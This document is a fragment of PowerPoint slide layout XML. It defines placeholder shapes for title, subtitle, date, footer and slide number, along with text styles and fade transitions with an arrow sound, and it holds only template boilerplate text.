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Lst>
  <p:sldSz cx="77724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56" d="100"/>
          <a:sy n="56" d="100"/>
        </p:scale>
        <p:origin x="2486" y="67"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="3168"/>
        <p:guide pos="24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1550" y="1646133"/>
            <a:ext cx="5829300" cy="3501813"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="3825"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971550" y="5282989"/>
            <a:ext cx="5829300" cy="2428451"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1530"/>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7F983A-F66B-BAF9-96C2-FC5E1A6BC025}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7C7152C3-1AE8-42A3-9931-9AB4F9BEAF92}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>8/3/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96793E3D-4E2D-6CEB-00F2-511504718E6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B6D576C-47A5-85AC-6104-D0E4982FA624}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{D754AD59-9BB7-49D9-AD24-9232273DF4AF}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1940119588"/>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1" name="arrow.wav"/>
          </p:stSnd>
        </p:sndAc>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition>
        <p:fade/>
        <p:sndAc>
          <p:stSnd>
            <p:snd r:embed="rId3"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3C94D8-7EE3-7D44-29AB-C08D957C162E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{72E8D637-3967-49B6-8ACE-99232F6CD3FF}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>8/3/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49A15E60-A658-9F60-DC68-3D2B4942AEA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335D45E-3D4B-3098-5E24-FE2794066821}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{4EA3C111-0C7B-4A35-973B-6E65ABE877BE}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4043402176"/>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1" name="arrow.wav"/>
          </p:stSnd>
        </p:sndAc>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition>
        <p:fade/>
        <p:sndAc>
          <p:stSnd>
            <p:snd r:embed="rId3"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34EF42-3799-F9B2-2D2A-6B8B03D7B6BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{AC5565D2-47D3-4D0D-BF2C-D904B457FCF0}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>8/3/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00D38C08-B7E7-EACB-579B-70A7344C2F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B5911E-9A8F-5798-60E0-A2654171C2C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{ECE9749C-E1A0-4926-98B5-07676AF5BC54}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2700224253"/>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1" name="arrow.wav"/>
          </p:stSnd>
        </p:sndAc>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition>
        <p:fade/>
        <p:sndAc>
          <p:stSnd>
            <p:snd r:embed="rId3" name="arrow.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929153"/>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1" name="arrow.wav"/>
          </p:stSnd>
        </p:sndAc>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition>
        <p:fade/>
        <p:sndAc>
          <p:stSnd>
            <p:snd r:embed="rId3"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2D5119-5A80-71E8-4ABD-542BC74A044F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{B5DE1AFA-D076-4FAE-AF88-8648E24A696F}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>8/3/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20067FA7-FFCC-C887-0A08-93BE6A2FF82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4C25D56-8120-A4D4-1992-31EBD58BB60A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{5486ACC8-A6CF-49C6-8817-A0D228C6CF22}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1477975493"/>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1" name="arrow.wav"/>
          </p:stSnd>
        </p:sndAc>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition>
        <p:fade/>
        <p:sndAc>
          <p:stSnd>
            <p:snd r:embed="rId3"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4" y="2507617"/>
            <a:ext cx="6703695" cy="4184014"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3825"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="530304" y="6731213"/>
            <a:ext cx="6703695" cy="2200274"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1530">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="291465" indent="0">
              <a:buNone/>
              <a:defRPr sz="1275">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="582930" indent="0">
              <a:buNone/>
              <a:defRPr sz="1148">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="874395" indent="0">
              <a:buNone/>
              <a:defRPr sz="1020">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1165860" indent="0">
              <a:buNone/>
              <a:defRPr sz="1020">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="1457325" indent="0">
              <a:buNone/>
              <a:defRPr sz="1020">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="1748790" indent="0">
              <a:buNone/>
              <a:defRPr sz="1020">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2040255" indent="0">
              <a:buNone/>
              <a:defRPr sz="1020">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="2331720" indent="0">
              <a:buNone/>
              <a:defRPr sz="10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595C48-5E64-38B4-186B-6E5526DC4A11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{A265E3AC-02CD-4D63-A6DF-02909FEC3FFE}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>8/3/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38CC7221-98EB-99D3-221C-6CEF9471AE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FADF355-46F6-48FC-B1CA-DC0835601321}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7AC26EDD-0E52-4A7E-8D0D-CE73A5DADB9A}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="330911473"/>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1" name="arrow.wav"/>
          </p:stSnd>
        </p:sndAc>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition>
        <p:fade/>
        <p:sndAc>
          <p:stSnd>
            <p:snd r:embed="rId3"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E3B16C57-AEC3-387B-8A20-A2333A3A3FF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{0AFA92EF-7326-45BC-8CEF-55841499FCCB}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>8/3/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68163BED-1D61-DFD7-641E-E765E7D86E6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1E46B6-FB6C-8724-45D6-A9D219E3F2B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{019C4D23-B6F1-45F9-8517-1CD69773D27B}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="532300347"/>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1" name="arrow.wav"/>
          </p:stSnd>
        </p:sndAc>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition>
        <p:fade/>
        <p:sndAc>
          <p:stSnd>
            <p:snd r:embed="rId3"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7"/>
            <a:ext cx="6703695" cy="1944159"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535365" y="2465706"/>
            <a:ext cx="3288089" cy="1208404"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1530" b="1"/>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4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535365"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1530" b="1"/>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6C8A02A3-994E-816B-CBFF-A1D6478EC4A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{3A475735-6FE6-440F-8E4C-AC68D260B5BB}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>8/3/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4A91951-CC91-C51D-8728-12CD735B288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2ECBBE9-2143-6A8B-C890-E690998A0A39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{4F5BA042-AF68-4C9D-9BAF-69359CF41963}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4078428117"/>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1" name="arrow.wav"/>
          </p:stSnd>
        </p:sndAc>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition>
        <p:fade/>
        <p:sndAc>
          <p:stSnd>
            <p:snd r:embed="rId3"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E997F006-B8AE-3E61-82D1-5A582AF87EE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{3B28FCE3-DFD4-457B-9D7D-369A7CC2D307}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>8/3/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C018E16F-62F2-A8C8-FA19-42D9D77A125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0BA51EC-9CF1-E855-687F-E62DB47D1347}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{67ABB806-D574-4D5F-99B8-538897274049}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1702342859"/>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1" name="arrow.wav"/>
          </p:stSnd>
        </p:sndAc>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition>
        <p:fade/>
        <p:sndAc>
          <p:stSnd>
            <p:snd r:embed="rId3"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935CAF8-552A-DD0D-AA38-A52D72A6B965}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{1DC30AE5-5F92-4F2E-BC0B-5EABB8C099FC}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>8/3/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FE16B83-0EC0-4F6D-F5EC-4ACE3895DE7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4CF57F7-7AA2-11F8-85F1-ED6D59A04EF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{A059BCF6-C574-4493-BE8D-E5A1768625F0}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1295138790"/>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1" name="arrow.wav"/>
          </p:stSnd>
        </p:sndAc>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition>
